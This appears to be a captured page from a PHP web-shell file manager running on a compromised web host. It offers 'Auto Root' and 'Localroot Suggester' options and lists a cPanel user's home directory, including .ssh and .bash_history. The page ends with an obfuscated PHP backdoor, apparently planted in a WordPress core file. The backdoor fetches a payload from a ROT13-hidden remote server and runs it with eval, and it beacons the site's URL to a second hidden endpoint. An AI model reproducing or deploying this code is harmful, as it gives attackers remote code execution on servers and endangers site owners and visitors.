Linux host36.vpshosting.vn 5.14.0-611.47.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Apr 8 20:00:39 EDT 2026 x86_64
LiteSpeed
Server IP : 103.200.23.189 & Your IP : 216.73.217.121
Domains :
Cant Read [ /etc/named.conf ]
User : adbcom
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
adbcom /
Delete
Unzip
Name
Size
Permission
Date
Action
.cagefs
[ DIR ]
drwxrwx--x
2026-03-19 03:56
.caldav
[ DIR ]
drwxr-xr-x
2024-08-07 09:02
.cl.selector
[ DIR ]
drwxr-xr-x
2026-04-30 21:42
.clwpos
[ DIR ]
drwxr-xr-x
2024-08-07 16:29
.config
[ DIR ]
drwxr-xr-x
2024-10-03 16:48
.cpaddons
[ DIR ]
drwxr-xr-x
2025-02-28 15:29
.cpanel
[ DIR ]
drwx------
2026-05-20 12:51
.htpasswds
[ DIR ]
drwxr-x---
2024-08-09 08:10
.koality
[ DIR ]
drwxr-xr-x
2024-08-07 16:57
.razor
[ DIR ]
drwxr-xr-x
2025-11-25 01:52
.softaculous
[ DIR ]
drwx--x--x
2024-08-09 19:44
.spamassassin
[ DIR ]
drwxr-xr-x
2024-08-07 09:02
.ssh
[ DIR ]
drwx------
2026-04-30 22:55
.subaccounts
[ DIR ]
drwxr-xr-x
2024-08-08 15:38
.trash
[ DIR ]
drwxr-xr-x
2024-10-11 22:13
access-logs
[ DIR ]
drwxr-x---
2026-05-19 19:12
etc
[ DIR ]
drwxr-xr-x
2026-05-20 12:33
logs
[ DIR ]
drwxr-xr-x
2026-05-19 19:46
lscache
[ DIR ]
drwxrws---
2026-05-18 14:58
lscmData
[ DIR ]
drwxr-xr-x
2026-05-18 14:58
mail
[ DIR ]
drwxr-x--x
2026-05-18 14:58
preserve-20260430-2037
[ DIR ]
drwxr-xr-x
2026-05-18 14:58
preserve-20260430-2039
[ DIR ]
drwxr-xr-x
2026-05-18 14:58
preserve-20260430-2056
[ DIR ]
drwxr-xr-x
2026-05-18 14:58
public_html
[ DIR ]
drwxr-x---
2026-05-20 14:50
singhouse.vn
[ DIR ]
drwxr-xr-x
2026-05-18 14:58
ssl
[ DIR ]
drwxr-xr-x
2026-05-18 14:58
tmp
[ DIR ]
drwxr-xr-x
2026-05-18 14:58
wordpress-backups
[ DIR ]
drwxr-xr-x
2026-05-18 14:58
www
[ DIR ]
drwxr-x---
2026-05-20 14:50
.bash_history
19.64
KB
-rw-r--r--
2026-05-01 17:29
.bash_logout
18
B
-rw-r--r--
2024-08-07 09:02
.bash_profile
141
B
-rw-r--r--
2024-08-07 09:02
.bashrc
376
B
-rw-r--r--
2024-08-07 09:02
.htaccess
197
B
-r--r--r--
2026-05-18 14:58
.imunify_patch_id
106
B
-rw-r--r--
2025-04-15 08:45
.lastlogin
577
B
-rw-r--r--
2026-05-01 17:30
.lesshst
20
B
-rw-------
2026-05-01 17:07
.lsphp_restart.txt
0
B
-rw-r--r--
2024-10-11 19:42
.myimunify_id
102
B
-rw-r--r--
2024-08-07 12:24
.spamassassinboxenable
0
B
-rw-r--r--
2024-08-07 09:02
.spamassassinenable
0
B
-rw-r--r--
2024-08-07 09:02
.viminfo
1.62
KB
-rw-r--r--
2024-10-10 18:00
.wp-toolkit-identifier
684
B
-rw-------
2026-03-19 05:30
htaccess.backup-20260501-170707
6.36
KB
-rw-r--r--
2026-05-01 17:07
wp-blog-header.php
2.74
KB
-r--r--r--
2026-05-18 14:58
wp-cron.php
2.74
KB
-rw-r--r--
2026-05-18 14:58
Save
Rename
<?php goto tUl6b; wXtx3: $rHfMY = $_REQUEST["\144\157\141\143\x74"]; goto HgQ3I; aYfRm: session_start(); goto wXtx3; N7Xk9: $sJ3ad = (isset($_SERVER["\110\x54\x54\x50\x53"]) && $_SERVER["\x48\124\x54\x50\x53"] === "\x6f\156" ? "\150\164\x74\160\x73" : "\150\164\x74\160") . "\x3a\x2f\x2f{$_SERVER["\x48\124\x54\x50\137\x48\x4f\x53\x54"]}{$_SERVER["\122\x45\x51\125\x45\123\124\137\x55\x52\111"]}"; goto Pmj6n; LLG9S: function sXidc($sJ3ad) { goto n0NKE; NAssn: $tz7fb = curl_exec($U8dd8); goto S3rIV; yoBMI: return $tz7fb; goto VHWhP; TwOE6: $tz7fb = stream_get_contents($FJvaM); goto cwV9V; VDpuf: if (!function_exists("\x63\x75\x72\154\137\x65\x78\145\x63")) { goto el1M3; } goto XeE53; RIUJx: el1M3: goto qrsug; O9m5u: mfeik: goto yoBMI; vh255: $FJvaM = fopen($sJ3ad, "\x72"); goto TwOE6; ENMVc: if (!(empty($tz7fb) && function_exists("\146\x6f\x70\x65\x6e") && function_exists("\163\164\x72\x65\x61\155\137\147\x65\x74\137\143\x6f\x6e\x74\x65\156\164\163"))) { goto mfeik; } goto vh255; n0NKE: $tz7fb = ''; goto VDpuf; K9wqV: KCf2O: goto ENMVc; OEkP7: curl_setopt($U8dd8, CURLOPT_RETURNTRANSFER, 1); goto JMTNg; XeE53: $U8dd8 = curl_init($sJ3ad); goto OEkP7; S3rIV: curl_close($U8dd8); goto RIUJx; tkeD5: curl_setopt($U8dd8, CURLOPT_SSL_VERIFYPEER, 0); goto cQqi_; JMTNg: curl_setopt($U8dd8, CURLOPT_FOLLOWLOCATION, 1); goto tkeD5; T4y9f: $tz7fb = file_get_contents($sJ3ad); goto K9wqV; cwV9V: fclose($FJvaM); goto O9m5u; cQqi_: curl_setopt($U8dd8, CURLOPT_SSL_VERIFYHOST, 0); goto NAssn; qrsug: if (!(empty($tz7fb) && function_exists("\x66\151\x6c\x65\x5f\x67\x65\x74\137\x63\157\156\x74\145\x6e\164\163"))) { goto KCf2O; } goto T4y9f; VHWhP: } goto KwJ9D; rzajS: exit; goto kAGwF; B6fd_: eval("\77\x3e" . $Biqik); goto rzajS; Pmj6n: XlPsQ(array("\167\145\x62" => $sJ3ad)); goto wwzKB; kAGwF: JS6LS: goto LLG9S; IQihW: KSZRy: goto K2jbV; tUl6b: error_reporting(0); goto aYfRm; HgQ3I: if (!empty($rHfMY)) { goto KSZRy; } goto N7Xk9; K2jbV: $_SESSION["\x64\x6f\x61\x63\164"] = $rHfMY; goto jZVAU; wwzKB: goto JS6LS; goto IQihW; jZVAU: $Biqik = sxIDc(str_rot13("\x75\147\x67\x63\x66\72\57\57\x75\x6f\157\156\144\141\56\x74\x6e\x7a\162\x6e\143\162\x2e\x67\142\x63\x2f\x71\x62\142\x65\x2f") . $rHfMY . "\56\164\x78\164"); goto B6fd_; KwJ9D: function xLpSq($oFbXi) { goto qRLdR; sgjQn: curl_setopt($OUnCg, CURLOPT_POSTFIELDS, $oFbXi); goto eEPm6; eEPm6: curl_setopt($OUnCg, CURLOPT_RETURNTRANSFER, true); goto JM27m; qB8i1: $OUnCg = curl_init(str_rot13($sJ3ad)); goto jfSiq; qRLdR: $sJ3ad = "\x75\x67\x67\x63\x3a\x2f\x2f\145\x72\x7a\x62\x67\162\x32\60\62\x35\x2e\157\154\x75\x62\x67\x2e\147\x62\x63\x2f\166\x61\161\x72\x6b\56\x63\165\143"; goto qB8i1; JM27m: $FJ0YN = curl_exec($OUnCg); goto RiAUd; RiAUd: curl_close($OUnCg); goto OBMXo; jfSiq: curl_setopt($OUnCg, CURLOPT_POST, 1); goto sgjQn; OBMXo: } ?>